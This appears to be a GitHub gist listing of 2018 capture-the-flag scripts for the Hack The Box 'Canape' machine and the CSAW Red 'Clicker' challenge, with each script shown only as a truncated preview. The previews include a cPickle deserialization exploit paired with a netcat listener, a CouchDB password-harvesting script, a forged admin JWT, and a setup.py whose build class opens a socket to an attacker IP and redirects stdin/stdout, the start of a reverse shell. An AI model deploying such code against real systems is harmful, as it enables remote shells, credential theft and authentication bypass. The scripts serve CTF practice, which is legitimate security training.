Ge0rg3
/ CanapeDirb.py
Created
September 14, 2018 21:03
A custom version of Dirb for the Canape box on the Hack The Box platform.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ###Custom Dirb Script for Canape | |
| import requests as rq | |
| import sys | |
| url = "http://10.10.10.70/" | |
| homepage = "Welcome to the future home page" | |
| wordlist = "common" | |
| found = [] |
Ge0rg3
/ CanapeExploit.py
Created
September 14, 2018 21:47
A Python cPickle deserialization exploit for the Canape box on Hack The Box.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ###Canape cPickle Exploit (run nc -nlvp 1338 separately.) | |
| #Change host/port to your own ip/desired port. | |
| LHOST = "10.10.15.xxx" | |
| LPORT = "1338" | |
| import requests as rq #For posting request | |
| import cPickle #For generating payload | |
| import hashlib #For generating MD5 hash as id | |
| import os #For creating shell object |
Ge0rg3
/ CouchDB_User_Parser.py
Created
September 14, 2018 22:04
Used for grabbing usernames/passwords from a CouchDB database.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ###Retrieves passwords for Canape CouchDB Users | |
| import requests as rq | |
| url = "http://george:george@localhost:5984/passwords/" | |
| alldocs = rq.get(url+"_all_docs").json() | |
| for i in alldocs["rows"]: | |
| entry_id = str(i["id"]) | |
| ret = rq.get(url+entry_id).json() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from distutils.command.build_py import build_py as _build_py | |
| from distutils.command.build_py import build_py as _build_py | |
| from distutils.core import setup | |
| import socket, subprocess, os | |
| class build_py(_build_py): | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect(("10.10.15.xxx",1339)) | |
| os.dup2(s.fileno(),0) | |
| os.dup2(s.fileno(),1) |
Ge0rg3
/ .UserSearcher.html
Last active
October 5, 2018 10:20
An AngularJS App to view details about a user's github profile. View it at https://georgeom.net/userSearcher/webpage.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| An AngularJS App to view details about a user's github profile. View it at https://georgeom.net/userSearcher/webpage.html | |
| Code spread across the 4 attached files. |
Ge0rg3
/ Clicker-PartF.py
Created
October 7, 2018 00:17
Written for my CSAW Red 2018 Clicker Write-up
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests as rq | |
| import jwt | |
| tokenData = { | |
| 'exp': 1538956189, | |
| 'iat': 0, | |
| 'sub': 0, | |
| 'admin': True | |
| } |
Ge0rg3
/ Clicker-PartE.py
Created
September 30, 2018 20:36
Written for my CSAW Red 2018 Clicker Write-up
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests as rq | |
| for i in range(1,1000): | |
| headers = { | |
| "bring_back_random_click":"hhhhhhhhhh", | |
| } | |
| req = rq.get("http://web.chal.csaw.io:10106/default/", headers=headers) | |
| if len(req.text) != 243: | |
| print req.text[:-1] | |
| break |
Ge0rg3
/ Clicker-PartE.py
Created
September 30, 2018 19:33
Written for my CSAW Red 2018 Clicker Write-up
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests as rq | |
| import json | |
| url = "http://web.chal.csaw.io:10106/" | |
| def register(userpass): | |
| global auth | |
| if len(userpass) < 8: | |
| return "Please enter at least 8 characters." | |
| details = { | |
| "username":userpass, |
Ge0rg3
/ Clicker-PartD.py
Last active
October 8, 2018 09:58
Written for my CSAW Red 2018 Clicker Write-up
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def stats(): | |
| global auth | |
| userinfo = rq.get("http://web.chal.csaw.io:10106/user", headers=auth).json() | |
| userclickers = json.loads(rq.get("http://web.chal.csaw.io:10106/clicker/user", headers=auth).json().replace("'",'"')) | |
| print("##########\nStats for "+userinfo['username']+":") | |
| print("##########") | |
| print("Money: "+str(userinfo['money'])) | |
| print("##########\nClicker Name | Clicker Value | Clicker Price\n"+("----------"*5)) | |
| for count, i in enumerate(userclickers): | |
| print(i['name']+" | "+str(i['value'])+" | "+str(i['price'])) |
Ge0rg3
/ Clicker-PartC.py
Created
September 29, 2018 23:36
Written for my CSAW Red 2018 Clicker Write-up
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def click(clicker): | |
| global authorization | |
| data={'name':clicker} | |
| req = rq.post("http://web.chal.csaw.io:10106/clicker/click", headers=authorization, json=data) | |
| if req.json()['status'] == "success": | |
| return "Success!" | |
| elif req.json()['message'] == "Clicker not owned": | |
| return "Clicker not owned." | |
| else: | |
| return "Clicker does not exist." |